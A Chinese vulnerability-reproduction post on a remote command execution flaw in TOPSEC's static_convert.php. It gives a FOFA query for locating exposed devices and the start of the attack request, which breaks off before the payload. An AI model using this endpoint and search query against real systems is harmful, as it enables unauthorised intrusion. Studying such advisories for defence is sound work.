【漏洞复现】天融信TOPSEC static_convert 远程命令执行漏洞
发布日期:2025-11-23 07:07 点击次数:50
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
福利:小编整理了大量电子书和护网常用工具,在文末免费获取。
01
—
漏洞名称
天融信TOPSEC static_convert 远程命令执行漏洞
02
—
漏洞影响
天融信TOPSEC
图片
03
—
漏洞描述
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统static_convert.php接口处存在RCE漏洞,会导致服务器失陷。
04
—
FOFA搜索语句app='天融信-上网行为管理系统'图片
05
—
漏洞复现
向靶场发送如下数据包
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=